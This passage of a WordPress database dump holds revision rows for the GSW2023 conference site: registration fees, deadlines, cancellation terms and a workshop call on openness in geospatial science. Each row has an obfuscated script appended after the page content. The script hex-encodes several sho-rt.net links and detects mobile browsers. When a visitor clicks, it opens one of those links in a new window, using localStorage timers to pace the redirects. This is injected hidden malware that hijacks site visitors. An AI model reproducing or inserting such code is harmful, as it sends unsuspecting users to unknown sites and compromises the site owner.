_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','TRAVEL GRANTS','','inherit','closed','closed','','2665-revision-v1','','','2023-03-30 06:03:00','2023-03-30 06:03:00','',2665,'https://gsw2023.com/?p=3974',0,'revision','',0),
(3976,1,'2023-03-31 00:07:15','2023-03-31 00:07:15','<p>[vc_row][vc_column][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt;\"><strong>THE REGISTRATION FORM IS NOW OPEN IN CONFTOOL:<a href=\"https://www.conftool.com/gsw2023/\">!REGISTER NOW!.</a></strong></span></p>\n<p>&nbsp;[/bsf-info-box][bsf-info-box icon_size=\"32\"]<span style=\"font-size: 14pt; font-family: Arial, Helvetica, sans-serif;\">The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</span></p>\n<p>&nbsp;[/bsf-info-box][ultimate_info_table color_scheme=\"gray\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\" heading_font_style=\"font-weight:bold;\"]&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td rowspan=\"2\"></td>\n<td colspan=\"3\">\n<h5><strong>Standard</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Student/Senior</strong></h5>\n</td>\n<td colspan=\"3\">\n<h5><strong>Accompanying person</strong></h5>\n</td>\n</tr>\n<tr>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n<td>\n<h5>Early bird</h5>\n</td>\n<td>\n<h5>Late</h5>\n</td>\n<td>\n<h5>On Site</h5>\n</td>\n</tr>\n<tr>\n<td>\n<h6>1<strong> Day</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$100</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>2 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong> $200</strong></h6>\n</td>\n<td>\n<h6><strong>$250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$125</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>3 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $450</strong></h6>\n</td>\n<td>\n<h6><strong>$500</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong> $250</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$150</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>4 Days</strong></h6>\n</td>\n<td>\n<h6><strong>$550</strong></h6>\n</td>\n<td>\n<h6><strong>$600</strong></h6>\n</td>\n<td>\n<h6><strong>$650</strong></h6>\n</td>\n<td>\n<h6><strong>$300</strong></h6>\n</td>\n<td>\n<h6><strong> $350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$175</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n</tr>\n<tr>\n<td>\n<h6><strong>5 Days</strong></h6>\n</td>\n<td>\n<h6><strong> $650</strong></h6>\n</td>\n<td>\n<h6><strong>$700</strong></h6>\n</td>\n<td>\n<h6><strong>$750</strong></h6>\n</td>\n<td>\n<h6><strong>$350</strong></h6>\n</td>\n<td>\n<h6><strong>$400</strong></h6>\n</td>\n<td>\n<h6><strong>$450</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$200</strong></h6>\n</td>\n<td>\n<h6><strong>$225</strong></h6>\n</td>\n</tr>\n</tbody>\n</table>\n<p>[/ultimate_info_table][bsf-info-box icon_size=\"32\" title_font=\"font_family:Raleway|font_call:Raleway\"]<span style=\"font-family: Arial, Helvetica, sans-serif; font-size: 14pt;\"><strong>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</strong></span></p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<strong><span style=\"font-size: 14pt;\">Registration deadlines</span></strong></p>\n<ul>\n<li>\n<p style=\"font-weight: 400;\">Early bird registration deadline: May 15, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></p>\n</li>\n<li>\n<p style=\"font-weight: 400;\">\n<p>Late registration deadline: July 15, 2023 <span style=\"text-decoration: line-through;\">July 1, 2023</span></li>\n</ul>\n<p><strong> </strong></p>\n<p><span style=\"font-size: 14pt;\"><strong>Important Notes:</strong></span></p>\n<ul>\n<li>Sc and M.Sc students are considered undergraduate university students or just graduated (3 months) and should upload a valid evidence of their student status when registering in ConfTool. PhD students should be max 30 years old and should provide valid evidence of their student status when registering in ConfTool.</li>\n<li>Seniors are considered participants over 65 years old September 2, 2023 and can show a valid ID on arrival.</li>\n<li>Any Registration allows a participant to present one paper accepted for publication. A participant can only have one registration!</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Registration Benefits</strong></span></p>\n<ul>\n<li><strong>Standard and student / senior (over 65) registration fees include:</strong></li>\n<li>Entry to all sessions/workshops;</li>\n<li>Entry to the Exhibition;</li>\n<li>Copy of Final Programme;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n<li>Lunches;</li>\n<li>Attendance at Welcome Reception (September 2, 2023);</li>\n<li>Attendance at Exhibitors Reception;</li>\n</ul>\n<p>&nbsp;</p>\n<ul>\n<li><span style=\"font-size: 14pt;\"><strong>Accompanying person fee includes:</strong></span></li>\n<li>Entry to Opening Session;</li>\n<li>Attendance at Welcome Reception;</li>\n<li>Attendance at Exhibitors Reception;</li>\n<li>Morning and Afternoon Tea/Coffee breaks;</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Cancellation policy:</strong></span></p>\n<ul>\n<li>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</li>\n</ul>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 14pt;\"><strong>Two social dinners will be organized on Tuesday and Thursday.</strong></span></p>\n<h5 style=\"text-align: justify; color: red;\"></h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2023-03-31 00:07:15','2023-03-31 00:07:15','',2638,'https://gsw2023.com/?p=3976',0,'revision','',0),
(3978,1,'2023-03-31 13:00:00','2023-03-31 13:00:00','<p>[vc_row][vc_column width=\"1/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_single_image image=\"3499\" img_size=\"600x600\" alignment=\"center\"][/vc_column][vc_column width=\"3/4\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\">Openness in Geospatial and Remote Sensing</span></strong></h5>\n<p>&nbsp;</p>\n<h5 style=\"text-align: justify;\"><strong>Openness helps improve access, use, reuse, and delivery of trustworthy information and data, foster innovation, shape new policies and enrich the delivery of services for societal needs in a more open and transparent manner. In the Geospatial and Remote Sensing domains, the concept of Openness is at the core of several initiatives, from policies and legal interventions in the field of Spatial Data Infrastructures (SDIs) such as e.g., the European INSPIRE Directive, to publicly-funded programmes like Copernicus, international partnerships such as the Group on Earth Observation (GEO), research approaches fostering open science, and community-led projects such as Pangeo, OpenStreetMap and the UN OpenGIS Initiative. The concept of Openness is based on three main elements: Accessibility (of data, software, standards and information), Inclusiveness (growing participation of diverse communities and partnerships between different actors: public sector, private sector, academia and citizens), and Reproducibility (effective sharing and reuse of resources and collaboration through open software tools, frameworks, libraries and open infrastructures).</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>This workshop aims at bringing together experts in Open Source for Geospatial and Open Earth Observation Science and Applications to: i) discuss the advancements in the fields of open source software, open standards, open science, open innovation and open educational resources in the Geospatial and Remote Sensing domains; ii) explore new technology developments that enable Openness in Geospatial and Remote Sensing; iii) evaluate how Openness contributes to scientific advancements; and iv) showcase applications that build upon open principles to deliver products and information with societal benefits. We welcome all types of papers addressing the above, including research papers, review papers as well as papers presenting new technology, approaches and case studies and highlighting the originality compared to the state of the art. We especially welcome papers that – to the maximum extent possible – are reproducible, i.e. make all artefacts (input data, computational steps, methods and code) openly available so that consistent results can be achieved. When available, the code used in the research work shall be released under an open source license.</strong></h5>\n<h5 style=\"text-align: justify;\"><strong>The workshop will be part of the ISPRS Geospatial Week 2023, and is organised by the ISPRS ICWG IV/III/II Openness in Geospatial Science and Remote Sensing. It will be a one-day single-track workshop of oral presentations and poster sessions.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"100px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"65\"][vc_separator color=\"sky\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>Advancements in and applications of Open Source Software for Geospatial</li>\n<li>Open and FAIR Data, Workflows and Knowledge – openness across the whole research lifecycle</li>\n<li>Open Infrastructures for Geospatial and Remote Sensing research</li>\n<li>Open Earth Observation Platforms and Open Earth/Geospatial Science in the cloud</li>\n<li>Use cases and applications based on Open Standards</li>\n<li>Transparency and reproducibility of solutions based on machine learning and deep learning</li>\n<li>Open Geospatial data, including from collaborative projects such as OpenStreetMap</li>\n<li>Open Geospatial communities and education – managing communities, new initiatives for open science, methods, and tools to promote openness</li>\n<li>Open Innovation and Participatory Research</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Codrina Maria Ilie, University of Technical Engineering of Bucharest and Terrasigna, Romania</li>\n<li>Peter Mooney, Maynooth University, Ireland</li>\n<li>Yair Grinberger, The Hebrew University of Jerusalem, Israel</li>\n<li>Claudia Vitolo, European Space Agency, Italy</li>\n<li>Stefanie Lumnitz, European Space Agency, Italy</li>\n<li>Stephan Meissl, EOX IT Services, Austria</li>\n<li>Alessandro Sarretta, National Research Council, Italy</li>\n<li>Alexander Kotsev, European Commission – Joint Research Centre (JRC), Italy</li>\n<li>Albana Kona, European Commission - Joint Research Centre (JRC), Italy</li>\n<li>Daniele Oxoli, Politecnico di Milano, Italy</li>\n<li>Marian Neagul, West University of Timisoara, România</li>\n</ul>\n<p>Other members to be added</p>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>ICWG IV/III/V Openness in Geospatial Science and Remote Sensing</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf